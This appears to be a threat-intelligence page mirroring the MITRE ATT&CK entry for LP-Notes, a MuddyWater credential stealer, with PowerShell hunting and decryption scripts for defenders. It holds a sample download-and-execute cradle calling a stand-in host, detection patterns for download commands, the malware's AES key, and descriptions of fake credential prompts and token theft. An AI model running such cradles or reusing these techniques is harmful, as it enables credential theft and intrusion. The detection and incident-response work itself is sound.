S9036: LP-Notes
LP-Notes is a C/C++ Windows credential stealer used by MuddyWater. LP-Notes was named after the `lp-notes.txt` file that is used to store stolen credentials.[1]
Analyst context for executives and security teams
LP-Notes is a Windows credential stealer associated in ATT&CK with MuddyWater. Its business significance is not just the malware name, but the credential-risk pattern: captured passwords can turn one endpoint incident into broader identity misuse, remote access abuse, and harder-to-investigate lateral movement. The ATT&CK relationship to a local file named `lp-notes.txt` for stolen credentials gives defenders a concrete artifact to validate, but coverage should not depend on that filename alone.
Executive priority
Treat this as an identity and incident-response readiness issue. Leaders should ask whether Windows endpoint monitoring, PowerShell logging, credential-theft response playbooks, and account-revocation processes can work together quickly when a stealer is suspected. Because ATT&CK provides no official detection guidance for LP-Notes, priority should be on validating evidence collection and response decisions rather than assuming existing malware signatures are sufficient.
Technical view
For SOC and IR teams, validate coverage around the related ATT&CK behaviors: GUI credential prompting, PowerShell execution, process discovery, local staging, archiving of collected data, token impersonation/theft, Native API use, and obfuscation/deobfuscation. Investigations should look for suspicious Windows processes creating or modifying credential-like staging files such as `lp-notes.txt`, PowerShell used near discovery or collection activity, unusual token manipulation, and follow-on use of valid accounts. Obfuscation-related relationships mean static file matching may be brittle; behavioral correlation is more valuable.
Likely telemetry
- Windows process creation and command-line telemetry
- PowerShell execution logs, including script block/module logging where enabled
- Endpoint file creation/modification events for local staging files, archives, and suspicious credential stores such as `lp-notes.txt`
- EDR telemetry for Native API usage, token impersonation, and suspicious process access where available
- Process discovery indicators, including enumeration of running processes
Detection direction
- Do not rely only on the `lp-notes.txt` filename; use the full staging path reported for this sample, `C:\Users\Public\Downloads\lp-notes.txt`, as a high-value hunting clue combined with process lineage and user context. Because the file contents are AES-encrypted, content inspection for plaintext credentials will not match; the write itself is the signal.
- Correlate PowerShell execution with nearby process discovery, file staging, archive creation, and credential-access indicators. The reported delivery is a download cradle (`Invoke-WebRequest` output passed to `Invoke-Expression`), so script block logging (event ID 4104) that captures both cmdlets in one block is the most direct evidence.
- Tune for fake or unexpected Windows Security credential dialogs and other credential collection behavior, while accounting for legitimate administrative elevation prompts and enterprise tooling.
- Review whether endpoint tooling exposes token impersonation/theft. This sample impersonates the security context of `taskhostw.exe` via `ImpersonateLoggedOnUser`, so handle access to `taskhostw.exe` from binaries in user-writable locations is worth alerting on; this is often a blind spot if only basic process and file logs are collected.
- Because official ATT&CK detection text is not provided, map detections to the related techniques rather than to a single LP-Notes signature.
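The hunting logic above, as an added example that is not part of the ATT&CK object or the ESET report. It applies the page's concrete indicators (the staging path, the `Invoke-WebRequest`/`Invoke-Expression` cradle, and handle access to `taskhostw.exe`) to simplified event records. The record shape, the `Get-LiveRecords` mapping onto Sysmon event IDs 10 and 11 and PowerShell event ID 4104, and the sample events are constructed for illustration; the assumption that token theft from `taskhostw.exe` surfaces as a Sysmon ProcessAccess event depends on your Sysmon configuration.

```powershell
# Added example: hunt for the LP-Notes behaviours described on this page.
# Indicators below are taken from the technique table; everything else is assumed.
$StagingFile  = 'C:\Users\Public\Downloads\lp-notes.txt'
$DownloadCmds = 'Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b'   # cmdlet plus its aliases (assumption: alias use)
$ExecCmds     = 'Invoke-Expression|\biex\b'

function Get-EventDataField {
    # Read a named <Data Name="..."> field from a Windows event's XML payload.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Find-LpNotesIndicators {
    # Input: simplified records with a Kind of FileCreate, ScriptBlock or ProcessAccess.
    # Output: one finding object per matching record.
    param([Parameter(ValueFromPipeline)] $Record)
    process {
        switch ($Record.Kind) {
            'FileCreate' {
                # The exact staging path is the strongest clue; the bare filename elsewhere is weaker.
                if ($Record.TargetFilename -ieq $StagingFile) {
                    [pscustomobject]@{ Severity = 'High'; Reason = 'LP-Notes staging path written'; Subject = $Record.Image; Detail = $Record.TargetFilename; User = $Record.User }
                } elseif ($Record.TargetFilename -imatch '\\lp-notes\.txt$') {
                    [pscustomobject]@{ Severity = 'Medium'; Reason = 'lp-notes.txt written outside the reported path'; Subject = $Record.Image; Detail = $Record.TargetFilename; User = $Record.User }
                }
            }
            'ScriptBlock' {
                # Download cradle: web request and Invoke-Expression in the same script block.
                $t = $Record.ScriptBlockText
                if ($t -imatch $DownloadCmds -and $t -imatch $ExecCmds) {
                    [pscustomobject]@{ Severity = 'High'; Reason = 'PowerShell download cradle (IWR + IEX)'; Subject = 'powershell'; Detail = $t; User = $Record.User }
                }
            }
            'ProcessAccess' {
                # Assumption: OpenProcess/OpenProcessToken on taskhostw.exe before ImpersonateLoggedOnUser
                # is visible as Sysmon event 10. Ignore sources under %SystemRoot% to cut noise.
                if ($Record.TargetImage -imatch '\\taskhostw\.exe$' -and $Record.SourceImage -inotmatch '^C:\\Windows\\') {
                    [pscustomobject]@{ Severity = 'Medium'; Reason = 'Handle to taskhostw.exe from non-Windows binary (possible token theft)'; Subject = $Record.SourceImage; Detail = $Record.GrantedAccess; User = $Record.User }
                }
            }
        }
    }
}

function Get-LiveRecords {
    # Live collection; requires Sysmon (IDs 10 and 11) and PowerShell script block logging (ID 4104).
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 11; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Kind = 'FileCreate'; Image = (Get-EventDataField $_ 'Image'); TargetFilename = (Get-EventDataField $_ 'TargetFilename'); User = (Get-EventDataField $_ 'User') } }
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Kind = 'ProcessAccess'; SourceImage = (Get-EventDataField $_ 'SourceImage'); TargetImage = (Get-EventDataField $_ 'TargetImage'); GrantedAccess = (Get-EventDataField $_ 'GrantedAccess'); User = (Get-EventDataField $_ 'SourceUser') } }
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Kind = 'ScriptBlock'; ScriptBlockText = (Get-EventDataField $_ 'ScriptBlockText'); User = $_.UserId } }
}

# Constructed sample records (not real telemetry) so the logic can be exercised offline.
$Sample = @(
    [pscustomobject]@{ Kind = 'FileCreate'; Image = 'C:\Users\Public\svc.exe'; TargetFilename = 'C:\Users\Public\Downloads\lp-notes.txt'; User = 'CORP\jdoe' },
    [pscustomobject]@{ Kind = 'FileCreate'; Image = 'C:\Windows\explorer.exe'; TargetFilename = 'C:\Users\jdoe\Documents\notes.txt'; User = 'CORP\jdoe' },
    [pscustomobject]@{ Kind = 'ScriptBlock'; ScriptBlockText = 'Invoke-Expression (Invoke-WebRequest -UseBasicParsing http://example.invalid/a).Content'; User = 'CORP\jdoe' },
    [pscustomobject]@{ Kind = 'ScriptBlock'; ScriptBlockText = 'Get-Process | Where-Object Name -eq taskhostw'; User = 'CORP\jdoe' },
    [pscustomobject]@{ Kind = 'ProcessAccess'; SourceImage = 'C:\Users\Public\svc.exe'; TargetImage = 'C:\Windows\System32\taskhostw.exe'; GrantedAccess = '0x1400'; User = 'CORP\jdoe' }
)

$Sample | Find-LpNotesIndicators | Format-Table -AutoSize
# Against live logs: Get-LiveRecords -Hours 72 | Find-LpNotesIndicators
```

The three sample hits (staging path write, download cradle, handle to `taskhostw.exe`) come from the same process and user; that co-occurrence, not any single rule, is what should drive escalation, and the `GrantedAccess` values worth keeping depend on what your Sysmon filter already passes.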
Mitigation priorities
- Prioritize rapid credential containment procedures: password reset, session revocation, and review of affected accounts when stealer activity is suspected.
- Harden Windows logging and endpoint visibility before an incident, especially PowerShell, process creation, file activity, and identity authentication telemetry.
- Reduce credential-theft blast radius through least privilege, privileged-access separation, and strong controls around reusable credentials.
- Validate controls that limit or alert on unauthorized PowerShell use, suspicious token manipulation, and abnormal local data staging.
- Use tabletop or IR readiness exercises to confirm SOC, identity, and endpoint teams can coordinate quickly on credential-stealer findings.
Analyst notes and limits
ATT&CK identifies LP-Notes as a C/C++ Windows credential stealer used by MuddyWater and notes the `lp-notes.txt` credential storage artifact. Software objects carry no tactics directly, but the technique relationships provide context across credential access, collection, execution, discovery, defense evasion, and privilege escalation. The MuddyWater relationship provides threat-intelligence context, but local conclusions should be based on observed telemetry.
Official detection guidance is not provided for this object. The supplied data supports Windows as the platform and the listed related techniques, and the relationship text contributes a staging path, an AES key and IV, the API and cmdlet names involved, and the `taskhostw.exe` target, but it does not provide file hashes, network indicators, confirmed exfiltration behavior, or environment-specific prevalence. Detection and risk decisions require local endpoint, identity, and incident evidence.
LP-Notes
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1106 | Native API | |
| Enterprise | T1056.002 | Input Capture: GUI Input Capture | LP-Notes has displayed a fake Windows Security dialog box to prompt for Windows credentials.[1] |
| Enterprise | T1078 | Valid Accounts | LP-Notes has used stolen Windows credentials to log in as the users.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | LP-Notes has decrypted strings with lengths ranging from 15 to 19 characters using the same decryption key for each string.[1] |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | LP-Notes has stored collected credentials in `C:\Users\Public\Downloads\lp-notes.txt`.[1] |
| Enterprise | T1560 | Archive Collected Data | LP-Notes has encrypted collected credentials using AES-CBC from the CNG API with the key `ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC` and the initialization vector `91A4E6F6D51DAEE773A8F00279792578`.[1] |
| Enterprise | T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | LP-Notes has dynamically resolved API functions during the C runtime startup.[1] |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | LP-Notes has been downloaded and executed by PowerShell's `Invoke-WebRequest` and `Invoke-Expression` cmdlets.[1] |
| Enterprise | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | LP-Notes has impersonated the security context of the taskhostw.exe process via the `ImpersonateLoggedOnUser` API.[1] |
| Enterprise | T1057 | Process Discovery | LP-Notes has searched for the process taskhostw.exe.[1] |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | LP-Notes has used a custom addition-based function and a string stacking function for string encryption.[1] |
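A 32-byte key and a fixed IV, both reported in the T1560 row above, mean a recovered `lp-notes.txt` can be decrypted offline during incident response. The script below is an added example, not LP-Notes code and not from the ESET report. It assumes PKCS#7 padding (what CNG applies when `BCryptEncrypt` is called with `BCRYPT_BLOCK_PADDING`), no header or salt in front of the ciphertext, and UTF-8 plaintext; the plaintext layout of a real sample is not described on this page, so verify these assumptions against an actual artifact. The `Protect-LpNotesBytes` function and the credential line it encrypts are constructed only to give the decryptor something to round-trip.

```powershell
# Added example: decrypt an LP-Notes staging file with the key/IV reported by ESET.
$LpNotesKeyHex = 'ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC'  # 32 bytes = AES-256
$LpNotesIvHex  = '91A4E6F6D51DAEE773A8F00279792578'                                  # 16 bytes = one block

function ConvertFrom-Hex {
    # Hex string to byte[]; the leading comma stops PowerShell unrolling the array on return.
    param([string]$Hex)
    $bytes = New-Object byte[] ($Hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) { $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16) }
    return ,$bytes
}

function New-LpNotesAes {
    # AES-CBC with the hard-coded key and IV; PKCS#7 padding is an assumption (see lead-in).
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = ConvertFrom-Hex $LpNotesKeyHex
    $aes.IV  = ConvertFrom-Hex $LpNotesIvHex
    return $aes
}

function Unprotect-LpNotesBytes {
    param([byte[]]$CipherText)
    if ($CipherText.Length -eq 0 -or ($CipherText.Length % 16) -ne 0) {
        throw "Ciphertext length $($CipherText.Length) is not a multiple of 16; not a raw AES-CBC blob, or a header is present."
    }
    $aes = New-LpNotesAes
    try {
        $dec   = $aes.CreateDecryptor()
        # A CryptographicException here usually means wrong key/IV, different padding, or a non-raw layout.
        $plain = $dec.TransformFinalBlock($CipherText, 0, $CipherText.Length)
        return [System.Text.Encoding]::UTF8.GetString($plain)
    } finally { $aes.Dispose() }
}

function Protect-LpNotesBytes {
    # Encrypt side, used only to build a constructed blob for the round-trip below.
    param([string]$PlainText)
    $aes = New-LpNotesAes
    try {
        $enc   = $aes.CreateEncryptor()
        $bytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText)
        return $enc.TransformFinalBlock($bytes, 0, $bytes.Length)
    } finally { $aes.Dispose() }
}

function Unprotect-LpNotesFile {
    # Decrypt a staging file recovered from disk (copy it off the host first; do not run this on the victim).
    param([string]$Path)
    Unprotect-LpNotesBytes ([System.IO.File]::ReadAllBytes($Path))
}

# Constructed round-trip with a fake credential line (not real data, not the real file format).
$blob = Protect-LpNotesBytes "CORP\jdoe:NotARealPassword1!`r`n"
Unprotect-LpNotesBytes $blob

# Against a recovered artifact:
# Unprotect-LpNotesFile 'C:\Users\Public\Downloads\lp-notes.txt'
```

Because the IV is fixed, two staging files that begin with the same plaintext share their first ciphertext block; that is a useful cross-host triage check even before decryption, and it is also why the same key/IV pair makes static detection of the encrypted file's first block feasible if the plaintext header is constant.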
Groups, software, and campaigns
G0069: MuddyWater
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. [2][3][4][5][6][7][8][9][10][11][12][13]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | (not recorded) | 1.0 | (not recorded) | Current bundle | cf3c26736ce5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026. (ESET_MuddyWater_Dec2025)
[2] MITRE ATT&CK. S9036: LP-Notes.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.